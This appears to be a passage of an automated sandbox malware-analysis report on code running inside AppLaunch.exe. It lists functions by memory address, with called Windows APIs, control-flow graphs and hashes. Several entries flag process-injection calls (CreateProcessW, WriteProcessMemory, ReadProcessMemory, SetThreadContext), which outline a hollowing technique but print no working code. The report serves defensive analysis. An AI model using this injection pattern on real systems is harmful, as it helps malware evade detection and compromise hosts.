                                                                                                                                                                        • Instruction ID: c623738d460973dc51d03f040c1b201a5b01681471cd5c7ddb439dfa100f1fdf
                                                                                                                                                                        • Opcode Fuzzy Hash: 44f840e6b7ebe504703a3962e267d3160e44ba091416e2fa38299e3aa92f3bb4
                                                                                                                                                                        • Instruction Fuzzy Hash: C45142B4900649CFDB10CFAAD588BDEBBF4BB48304F24C469E009A7390DB786944CF65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E3033C Relevance: 1.7, APIs: 1, Instructions: 158processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1744 9e3033c-9e31c99 1746 9e31ca1-9e31ca8 1744->1746 1747 9e31c9b-9e31c9e 1744->1747 1748 9e31cb3-9e31cc9 1746->1748 1749 9e31caa-9e31cb0 1746->1749 1747->1746 1750 9e31cd4-9e31d80 CreateProcessW 1748->1750 1751 9e31ccb-9e31cd1 1748->1751 1749->1748 1753 9e31d82-9e31d88 1750->1753 1754 9e31d89-9e31e01 1750->1754 1751->1750 1753->1754 1761 9e31e13-9e31e1a 1754->1761 1762 9e31e03-9e31e09 1754->1762 1763 9e31e31 1761->1763 1764 9e31e1c-9e31e2b 1761->1764 1762->1761 1766 9e31e32 1763->1766 1764->1763 1766->1766
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 09E31D64
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 963392458-0
                                                                                                                                                                        • Opcode ID: 8d8f329ab2219626316a3928d76016a4bfc7551a8549b28a386310d9d49359fb
                                                                                                                                                                        • Instruction ID: 845dc299ecf8b2019585740c6e53fc54b8e75e2eaf555fd553cdf86e7adac0e2
                                                                                                                                                                        • Opcode Fuzzy Hash: 8d8f329ab2219626316a3928d76016a4bfc7551a8549b28a386310d9d49359fb
                                                                                                                                                                        • Instruction Fuzzy Hash: D0514671900269CFDF24CF99C984BDDBBB5BF48304F4084AAE909B7240DB759A89CF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3CCAD Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1767 9c3ccad-9c3cd1e 1768 9c3cd20-9c3cd26 1767->1768 1769 9c3cd29-9c3cd30 1767->1769 1768->1769 1770 9c3cd32-9c3cd38 1769->1770 1771 9c3cd3b-9c3cd73 1769->1771 1770->1771 1772 9c3cd7b-9c3cde0 CreateWindowExW 1771->1772 1773 9c3cde2-9c3cde8 1772->1773 1774 9c3cde9-9c3ce21 1772->1774 1773->1774 1778 9c3ce23-9c3ce26 1774->1778 1779 9c3ce2e 1774->1779 1778->1779 1780 9c3ce2f 1779->1780 1780->1780
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09C3CDCA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                                        • Opcode ID: ee95f35d534a93094f4aff63c5d3a1b2b2f2461f4e89eed3dd28984cc93c9a0a
                                                                                                                                                                        • Instruction ID: 5904aa12ce17f1f8c699901867009d199f9393f1000cc7074fc6071a89a62cb9
                                                                                                                                                                        • Opcode Fuzzy Hash: ee95f35d534a93094f4aff63c5d3a1b2b2f2461f4e89eed3dd28984cc93c9a0a
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B51C0B1D00209EFDB14CFA9D884ADEFFB5BF48354F64812AE819AB210D7759985CF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3CCB8 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1781 9c3ccb8-9c3cd1e 1782 9c3cd20-9c3cd26 1781->1782 1783 9c3cd29-9c3cd30 1781->1783 1782->1783 1784 9c3cd32-9c3cd38 1783->1784 1785 9c3cd3b-9c3cde0 CreateWindowExW 1783->1785 1784->1785 1787 9c3cde2-9c3cde8 1785->1787 1788 9c3cde9-9c3ce21 1785->1788 1787->1788 1792 9c3ce23-9c3ce26 1788->1792 1793 9c3ce2e 1788->1793 1792->1793 1794 9c3ce2f 1793->1794 1794->1794
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 09C3CDCA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                                                        • Opcode ID: 21885113b4e604e3c57af573a9e1f2e7cec7236346143f687938508470ee2692
                                                                                                                                                                        • Instruction ID: eaa81f243f1b0d8295243377f1777704325e813aa864c8ad32b89bf63faac954
                                                                                                                                                                        • Opcode Fuzzy Hash: 21885113b4e604e3c57af573a9e1f2e7cec7236346143f687938508470ee2692
                                                                                                                                                                        • Instruction Fuzzy Hash: 6551B0B1D00309DFDB14CFAAD884ADEBBB5BF48314F64852AE819AB210D775A945CF90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C31B54 Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1795 9c31b54-9c31bb7 1796 9c31c0b-9c31c5d LoadLibraryA 1795->1796 1797 9c31bb9-9c31bde 1795->1797 1800 9c31c66-9c31c97 1796->1800 1801 9c31c5f-9c31c65 1796->1801 1797->1796 1802 9c31be0-9c31be2 1797->1802 1807 9c31ca7 1800->1807 1808 9c31c99-9c31c9d 1800->1808 1801->1800 1804 9c31c05-9c31c08 1802->1804 1805 9c31be4-9c31bee 1802->1805 1804->1796 1809 9c31bf2-9c31c01 1805->1809 1810 9c31bf0 1805->1810 1813 9c31ca8 1807->1813 1808->1807 1811 9c31c9f 1808->1811 1809->1809 1812 9c31c03 1809->1812 1810->1809 1811->1807 1812->1804 1813->1813
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 09C31C47
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: cab681ab59413c1499d938b38f84a1444cf1e906d7bbaeb3b9c7b4944723898c
                                                                                                                                                                        • Instruction ID: fc0a10120a0ea1747583ebcb16bb9864862ae52576ac306e996277b7120c4e0c
                                                                                                                                                                        • Opcode Fuzzy Hash: cab681ab59413c1499d938b38f84a1444cf1e906d7bbaeb3b9c7b4944723898c
                                                                                                                                                                        • Instruction Fuzzy Hash: 714135B0D042189FDB10CFA9E9857DEBBF5FB48308F18852AE815AB380D7759846CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3E404 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1814 9c3e404-9c3f7c4 1817 9c3f874-9c3f894 call 9c3b05c 1814->1817 1818 9c3f7ca-9c3f7cf 1814->1818 1825 9c3f897-9c3f8a4 1817->1825 1819 9c3f822-9c3f85a CallWindowProcW 1818->1819 1820 9c3f7d1-9c3f808 1818->1820 1822 9c3f863-9c3f872 1819->1822 1823 9c3f85c-9c3f862 1819->1823 1827 9c3f811-9c3f820 1820->1827 1828 9c3f80a-9c3f810 1820->1828 1822->1825 1823->1822 1827->1825 1828->1827
                                                                                                                                                                        APIs
                                                                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 09C3F849
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CallProcWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2714655100-0
                                                                                                                                                                        • Opcode ID: 2346e7bc4dd7214ef16b661f972231b3b6209ad102ce60c986aff5f889fec6ff
                                                                                                                                                                        • Instruction ID: 42a3c5eeb23d7a0ec920cdad8a47b0b203c59d252cc6e40838d27ca93e9a4d99
                                                                                                                                                                        • Opcode Fuzzy Hash: 2346e7bc4dd7214ef16b661f972231b3b6209ad102ce60c986aff5f889fec6ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 754137B4D00205DFDB14CF99D488AAABBF9FB89314F24C959E519AB321D334A941CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C31B60 Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1831 9c31b60-9c31bb7 1832 9c31c0b-9c31c5d LoadLibraryA 1831->1832 1833 9c31bb9-9c31bde 1831->1833 1836 9c31c66-9c31c97 1832->1836 1837 9c31c5f-9c31c65 1832->1837 1833->1832 1838 9c31be0-9c31be2 1833->1838 1843 9c31ca7 1836->1843 1844 9c31c99-9c31c9d 1836->1844 1837->1836 1840 9c31c05-9c31c08 1838->1840 1841 9c31be4-9c31bee 1838->1841 1840->1832 1845 9c31bf2-9c31c01 1841->1845 1846 9c31bf0 1841->1846 1849 9c31ca8 1843->1849 1844->1843 1847 9c31c9f 1844->1847 1845->1845 1848 9c31c03 1845->1848 1846->1845 1847->1843 1848->1840 1849->1849
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 09C31C47
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: 479421e33491d3261a9167a031c8d6efa53fae886cc148e3e85d0703eda04737
                                                                                                                                                                        • Instruction ID: 420b874d6800f7195571f60d4bd2389c24aa3cfdf6207ad82694e69a839c5fa9
                                                                                                                                                                        • Opcode Fuzzy Hash: 479421e33491d3261a9167a031c8d6efa53fae886cc148e3e85d0703eda04737
                                                                                                                                                                        • Instruction Fuzzy Hash: 994136B0D042589FDB10CFA9E8857DEBBF5FB48314F188529E815AB380D7759846CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05436622 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1850 5436622-5436ab9 1853 5436ac5-5436afb EnumResourceNamesW 1850->1853 1854 5436abb-5436ac3 1850->1854 1855 5436b04-5436b31 1853->1855 1856 5436afd-5436b03 1853->1856 1854->1853 1856->1855
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 8fe0431e5b9930e9200b6977a92f97e4e2a99c618d08c9b866ed499a9de4e89e
                                                                                                                                                                        • Instruction ID: 513d62042ecd0c617ba661850d0485ee071ca412ef4ce81d617e7b0539f4539f
                                                                                                                                                                        • Opcode Fuzzy Hash: 8fe0431e5b9930e9200b6977a92f97e4e2a99c618d08c9b866ed499a9de4e89e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5C217F71900209DFCB10CF99D845BEEBBF9FB48324F148429D559A7350D738A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E32008 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09E3208C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                        • Opcode ID: 1afa5a995c6c5ee61ed8b6695394e27fcb666613e13cfd712099858fc4b3de7a
                                                                                                                                                                        • Instruction ID: 44096b0a94d8c454b589d17f935db20cd42458a8ffd93ee296e08d1e9962339b
                                                                                                                                                                        • Opcode Fuzzy Hash: 1afa5a995c6c5ee61ed8b6695394e27fcb666613e13cfd712099858fc4b3de7a
                                                                                                                                                                        • Instruction Fuzzy Hash: 832116B5900209EFCB10CF99D984BDEBBF8FB48314F50842AE958A7340D378A944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3E899 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09C3E927
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: 2272f0f3f4b005863920501c79edd23527d91123342446ed2b50167930f6a6c2
                                                                                                                                                                        • Instruction ID: 6657409d47adf7a4ca89d85d6e2de4598450f4484d783349fd04d8480fd56f79
                                                                                                                                                                        • Opcode Fuzzy Hash: 2272f0f3f4b005863920501c79edd23527d91123342446ed2b50167930f6a6c2
                                                                                                                                                                        • Instruction Fuzzy Hash: E621E4B5D002099FCB10CFA9D484ADEFBF8FB48324F14852AE954A7310D374A955CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0543662C Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: a157b210928c0fd8272b19a41e70ccd924088d67e50de79b11e6d1105909e4fb
                                                                                                                                                                        • Instruction ID: faf2a4e3a2325bcfbe17584788464a539079b54148cad82ba58f4799b8431f02
                                                                                                                                                                        • Opcode Fuzzy Hash: a157b210928c0fd8272b19a41e70ccd924088d67e50de79b11e6d1105909e4fb
                                                                                                                                                                        • Instruction Fuzzy Hash: C4213D71900209DFCB14DF99D845BEEBBF9FB88324F248429E519A7350D778A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 05436A69 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceNamesW.KERNELBASE(?,?,00000000,?,?,?,?,?,05436A56,00000000,00000000), ref: 05436AE8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                                                        • Opcode ID: 069d3967b4eb970b45e052d97ce97135c27ab367c89605bd23663fcbb56fb697
                                                                                                                                                                        • Instruction ID: 3ad945573cfeaeb44d784715376520489aca2f9f390a6db93a8ac9913753fca4
                                                                                                                                                                        • Opcode Fuzzy Hash: 069d3967b4eb970b45e052d97ce97135c27ab367c89605bd23663fcbb56fb697
                                                                                                                                                                        • Instruction Fuzzy Hash: 45213A719002099FDB14CF99D845BEFBBF5FB88324F248429E459A7350D738A955CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0543689B Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 05436918
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumResourceTypes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 29811550-0
                                                                                                                                                                        • Opcode ID: a4fe1b2015ec80c217332de2ff9e40d2df5a4927a1c5c089bfe9aa7389dfafbe
                                                                                                                                                                        • Instruction ID: e639ba545e6ed9d9f3cd9ccaf5083e1e4e12d30af65cdec226726e3ca6eb6333
                                                                                                                                                                        • Opcode Fuzzy Hash: a4fe1b2015ec80c217332de2ff9e40d2df5a4927a1c5c089bfe9aa7389dfafbe
                                                                                                                                                                        • Instruction Fuzzy Hash: 2E2136719002098FCB14CF99D944BEEBBF5BF88314F14842AD419A7250D738A945CFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09C3E8A0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 09C3E927
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.933882138.0000000009C30000.00000040.00000001.sdmp, Offset: 09C30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9c30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: ebb49c8664c4fade9c8c6c63127470b31ac476d3eda89b126d7a7e224db4adce
                                                                                                                                                                        • Instruction ID: 32c7664e3476037140016ddd48792b5bc1a6f6c1efcbdf9290a4c129b91ba768
                                                                                                                                                                        • Opcode Fuzzy Hash: ebb49c8664c4fade9c8c6c63127470b31ac476d3eda89b126d7a7e224db4adce
                                                                                                                                                                        • Instruction Fuzzy Hash: CC21A5B5D00209DFDB10CF99D584ADEBBF8FB48324F54841AE914A7350D374A955CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E32010 Relevance: 1.6, APIs: 1, Instructions: 62injectionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09E3208C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                                        • Opcode ID: cd66369ec463c4088304929c7c580fb3b51c4e91d85c53ca794f03dd5a562d20
                                                                                                                                                                        • Instruction ID: 3abeab484ef0bb3fbf65423662b736201c1bd78651eedca0ec5a669d9fa945f9
                                                                                                                                                                        • Opcode Fuzzy Hash: cd66369ec463c4088304929c7c580fb3b51c4e91d85c53ca794f03dd5a562d20
                                                                                                                                                                        • Instruction Fuzzy Hash: 4821D5B1900209DFDB10CF99D984BDEBBF8FB48314F54842AE958A7340D379A945CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 054368A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • EnumResourceTypesW.KERNEL32(?,00000000,?), ref: 05436918
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.932126221.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_5430000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: EnumResourceTypes
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 29811550-0
                                                                                                                                                                        • Opcode ID: 104207cb6538e050402f43f0e22d48a405b5a75d05a22227f15f50f3c31bd779
                                                                                                                                                                        • Instruction ID: 31d8be5649b2f0d76d2a57c9f7f233c46cedf5e79fbeef1dc66ee401881e2530
                                                                                                                                                                        • Opcode Fuzzy Hash: 104207cb6538e050402f43f0e22d48a405b5a75d05a22227f15f50f3c31bd779
                                                                                                                                                                        • Instruction Fuzzy Hash: 762128719002099FCB14CF99D945BEEFBF9FF88314F14842AD415A7250D778A945CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E31F41 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09E31FB9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                        • Opcode ID: 51073ad038830c3b792df6100f8846bf4c8d4d17c506998327a8975733789e82
                                                                                                                                                                        • Instruction ID: f331bb2d59e8b292ce3dc3fd8323a5a3d37a142058c5d3b2f3fc8e5ffd0e1615
                                                                                                                                                                        • Opcode Fuzzy Hash: 51073ad038830c3b792df6100f8846bf4c8d4d17c506998327a8975733789e82
                                                                                                                                                                        • Instruction Fuzzy Hash: 8421E3B1900209DFCB10CF9AD984AEEBBF4FB48314F50842EE919A7210D338A955CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E31F48 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 09E31FB9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                                        • Opcode ID: e719766f9ebda6c20d7d7bba62f431c757e0a12bb2fa0c77d48af023deb75ef9
                                                                                                                                                                        • Instruction ID: b7f719686fd1c09492d684ad82acadf679759b71425445619bd0867af0b9a39c
                                                                                                                                                                        • Opcode Fuzzy Hash: e719766f9ebda6c20d7d7bba62f431c757e0a12bb2fa0c77d48af023deb75ef9
                                                                                                                                                                        • Instruction Fuzzy Hash: 0621E7B5900209DFCB10CF9AD984BDEFBF8FB48314F50842AE918A7240D378A945CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E31E88 Relevance: 1.6, APIs: 1, Instructions: 56threadinjectionCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 09E31EF3
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ContextThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1591575202-0
                                                                                                                                                                        • Opcode ID: c5d5ccf393599d78ff4ce3cf0321e11fef0cf58f35058c5813aa5bde6c5c10d4
                                                                                                                                                                        • Instruction ID: 8ec65aebbb05f4e7184c1a3fe90e67704450a0be9995429fb1ca69f1ac3f9ea9
